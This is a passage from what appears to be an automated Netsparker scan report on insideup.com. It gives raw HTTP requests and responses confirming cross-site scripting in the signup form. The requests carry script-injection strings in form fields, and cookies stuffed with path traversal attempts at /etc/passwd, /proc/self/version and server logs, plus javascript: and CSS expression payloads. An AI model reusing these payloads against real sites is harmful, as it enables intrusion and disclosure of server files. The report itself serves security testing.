OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 260
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001312)%3c%2fscript%3e&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&companyName=Smith&password1=3&password2=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:41:30 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=D383696ECF1E26DF8E0F6A2770A4964A; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="'"--></style></script><script>netsparker(0x001312)</script>" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 formError" /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailA..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST '"--></style></script><script>alert(0x001323)</script>
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 237
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001323)%3c%2fscript%3e&firstName=Smith&lastName=Smith&companyName=Smith&password1=3&password2=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:41:39 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=9AB8ABEC9A2008FE5CE228DED8ABDAED; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" 